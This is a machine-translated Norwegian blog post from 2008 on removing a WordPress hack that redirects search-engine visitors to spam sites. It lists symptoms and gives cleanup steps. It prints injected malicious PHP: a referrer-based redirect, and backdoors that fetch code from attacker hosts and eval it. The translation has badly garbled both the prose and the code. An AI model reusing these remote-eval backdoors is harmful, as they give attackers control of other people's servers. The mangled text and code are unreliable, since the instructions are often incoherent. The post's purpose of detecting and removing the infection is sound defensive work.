WordPress Banalisere: Komme seg og Fastsette Google og S�ke Maskinen eller Nei Koke Trafikk Omadressert � Din-Needs.info, AnyResults.Net, Gylden-Info.net og Annet Illegal Steder

Banalisere g�r alle ut � banalisere og bedrift WordPress blogs kroen over det hele det web, beplantning og innspr�ytningen ondsinnet koden i WordPress koder og data bank for at omdirigere bes�kende og finner fra Google og annet s�ke maskinen � spam steder som din-needs.info, anyresults.net, gylden-info.net, keymachine.de, beliy.us, seogoogle.us og mange annet spam steder det fylte med l�nn-per- falle i staver CPC annonser. Noe banalisere fremg�r � m�l betydeligere samling av omadresserer alle uten WordPress koke. Uten blitt banalisere, disse trafikk antok � ankomme til det blog idet bestemmelsessted.

Tegn av gjennoms�kningen Maskinen Omadresserer Banalisere

Note det ikke alle tegn kanskje finne sted aldeles. Der kanskje v�re mer enn ettall metoden av banalisere eksistert, hvilke bidro � annerledes oppdagelse og mulig resolution.

• Alle falle i staver igjennom fra s�ke maskinen som Google, Yahoo, AOL, MSN, Vinduer Bo s�ke resultater, inkluderer blog navnet, ville v�re omadressert og avsendt � banalisere’ steder som din-needs.info, anyresults.net, gylden-info.net, keymachine.de, beliy.us, seogoogle.us, med det liste sikker � avle. Seer ankommer for det banalisere side med det likt s�ke hyssing det han eller hun pleide s�ke inne s�ke maskinen.
• Falle i staver opp p� en koble sammen � det blog opp p� RSS mate leseren som Google leseren kan omadressert � banalisere sted ogs�.
• EN bes�kende med nei regningen p� blog, eller ikke logikk ( herav er ikke har koke oppdaget av ondsinnet koden), ville v�re omadressert � spam steder.
• Bare bes�ker fra s�ke maskinen er blitt omadressert fjerne, og kunsten greie � idioten i n�rheten sannsynligvis en masse bloggers, webmasters og sted eiere, eller det vil si forsinkelsen oppdagelsen av problemet.
• Bardus veldig og dramatisk miste og miste av sv�r bel�pet av bes�kende trafikk og side synspunkter inne web bane statistikken, s�rlig trafikk med Google idet henvist, selv om s�ke maskinen resultater ranking er i behold.
• Sv�r miste av annonseinntekten fra Google AdSense eller annet annonser nettverk, eller oppta kommisjoner.
• Det fulgte basis kodet PHP koden kanskje komme p� wp-blog-header.php arkiv:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ idet $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==false){ $ser1=”?;brekke; }
hvis && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);utgangen; }? >

• En image, hvilke er faktisk en samling av ondsinnet PHP koden, var addert � det wp- innholdet/ sendinger adresseliste. For eksempel, wp- innholdet/ sendinger/2008/06/06/abcdefghijklmn.jpg, eller den kanskje v�re innenfor din seg brosjyre, i.e. wp-contents/themes/classic/images/xyz.jpg. Navnet av bildet kanskje v�re i formatet av xxxxxx_old.jpeg.
• En komme inn var satt inn inne MySQL data bank for WordPress wp_options � aktivere bildet ( det ondsinnet PHP koden) som plugg, karakteristisk idet rss_f541b3abd05e7962fcab37737f40fad8.
• Der kanskje v�re likeledes ondsinnet koder, s�rlig dem det forklarte med vurdere() eller base64_decode() kommandere blitt satt inn i annet WordPress PHP fil-st�rrelse. Eksempler er det fulgte koder:

  ifisset_GET'p'(($[])) {
$sock = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($sock, ‘ bli http:/km20725.keymachine.de/ server/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($sock, ‘ vert: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($sock));
$innhold = b�nnfalle(”, $ innhold);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($sock);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ server/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ server/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress seg det er blitt aktivert og anvendt kan innspr�ytet med banalisere koden og ber�rt ogs�. Slik koden normalt eksisterer inne header.php eller index.php av det seg, og har en line analog med det neden

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

Det WordPress s�ke trafikk omdirigere � spam sted banalisere hender sannsynligvis p� grunn av garanti hull og vulnerability det er ikke lappet n�r blog eier avgj�r ikke for � oppgradere � nyest versjon av WordPress ( til tross for noemeddeler det deres blogs blitt banalisere selv om dens’ allerede p� nyest versjon av WordPress 2.5.1). Hva enn �rsaken, her over’ det fastsette og l�sning � l�se og nederlaget det banalisere � sikre det du egen rygg trafikken og unng� blitt straffe av Google av ufornuftig omadresserer � spam sider.

1. Sikkerhetskopien det WordPress data bank.
2. Bruk phpMyAdmin � kikke WordPress MySQL data bank registre. G� til wp_options bord, og s� redigere raden benevnt active_plugins. Raden detaljene alle aktiv plugg det er blitt aktivert. Erfare listen ( inne en sluke en historie r�tt), kikke etter en en plugg benevnt endte med en image forlengelsen, som .jpg, .jpeg, .gif og etc. For eksempel, abcdefgh_old.jpeg. Skrive ned forbindelsesveien � bildet arkiv.
3. Benytter sFTP eller SSH ( glem om FTP eller Telnet for garanti), s� navigere � forbindelsesveien av filen, og fjerne filen.
4. G� til WordPress Administrator Plugg panel, deaktivere eller aktivere alle plugg � helt av det ondsinnet plugg fra det “active_plugins” rad.
5. Rygg � phpMyAdmin, for det wp_options bord, finner en rad det behersker det fulgte hyssing idet option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Fjerne raden fjerne.

   Hvis du dont’ vite hvor � utf�re databasen rengj�ring detaljert inne skritt over, her over’ en video undervisningstimene:

6. G� til wp_users bord. Hvis det er en navnl�s bruker ( null salgsverdi inne user_nicename �ker) skapt for 000000:: opp p� 0000-00-00, skrive ned brukeren ID (ID �ker, et antall). Fjerne brukeren.
7. Kikke det wp_usermeta bord. Finne alle rekkene med bruker passer til det ID av det fjernet illegal bruker. Der er normalt tre rekkene blitt forbundet � det inntrengere bruker ID. Fjerne alle forbundet rekkene.
8. Logikk � servitisen � redigere det seg fil-st�rrelse, eller kikke det seg fil-st�rrelse’ koden inne Seg Editor av WordPress Administrator Tegning panel. Sjekk det header.php og index.php for alle mistenksom koden. Som nevnt ovenfor, kikke etter et eller annet analog med linjen neden:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Hvis de finner det, fjerne og fjerne koden. Note det det ondsinnet koden ville v�re adskillige linjer lang inne sum.

9. Hvis dens’ ikke allerede eksistert, opprette en tom emballasje index.html arkiv inne det wp- innholdet/ plugg adresseliste. Tomrommet index.html gjemmer innholdet av det plugg adresseliste, effektivt skjerme hva plugg-ins blitt anvendt fra banalisere � gj�re hard og stramme det WordPress garanti.
10. Sende og ombytte hver og enhver WordPress fil-st�rrelse ( ikke alene men ogs� wp-blog-header.php) p� server med det frisk, feilfri, og originalnyest versjon fra WordPress (naturligvis, bortsett fra f� fil-st�rrelse som wp-config.php og seg). Hvis din’ oppgraderer, lese detguide forsiktig.
11. Endre din passord.
12. Hvis du har mangfoldig brukernes, endre deres passord ( eller anmode seg � endre passordet) ogs�.

betydelig: Denne er en apparat oversatt side hvilke er skaffet " idet er" uten garanti. Apparat oversettelse kanskje v�re vanskelig � forst�. Behage henviser tiloriginal Engelske gjenstand n�r som helst mulig.

Aksje og levere eller bli teknisk oppbacking og hjelpe forMeg Digital Livet Forums.

I slekt Varene

• Sammenlegge NoFollow Slektskap � WordPress Blogroll � Forh�ye PageRank
• WordPress Plugg: Utfoldelse Google Analytisk og FeedBurner Meddeler Statistikken fra Sted Admin
• Technorati Innkommende Golfbane Plugg for WordPress
• EN Se p� Google Kj�pmann S�ke
• Hvor � Unng�, Omkj�ringsvei eller Flukt Google Sand
• SEO Vennlig Bearbeide Metoden � Bevege Website URL Fra Underbibliotekene � Rot Foreldre Brosjyre
• Kj�re Flere Trafikk av Benytter Profilen
• Ask.com S�ke Maskinen Anmelde av CNNMoney
• Integrere og Utfoldelse Google AdSense for S�ke og Tilpasse-Op Skikk og bruk S�ke Maskinen Resultater inne WordPress Blog Side Mal
• StatTraq Wordpress Plugg for Sted Statistisk og Trafikk Telleren

Denne komme inn var postet opp p� Tirsdag, Juni 10th, 2008 for 103: er og er arkivert underWeblogs. Du kanne f�lge etter etter alle svar � denne komme inn igjennom detRSS 2.0 mate Du kanneavreise en svaret,eller styrekule fra din egen sted.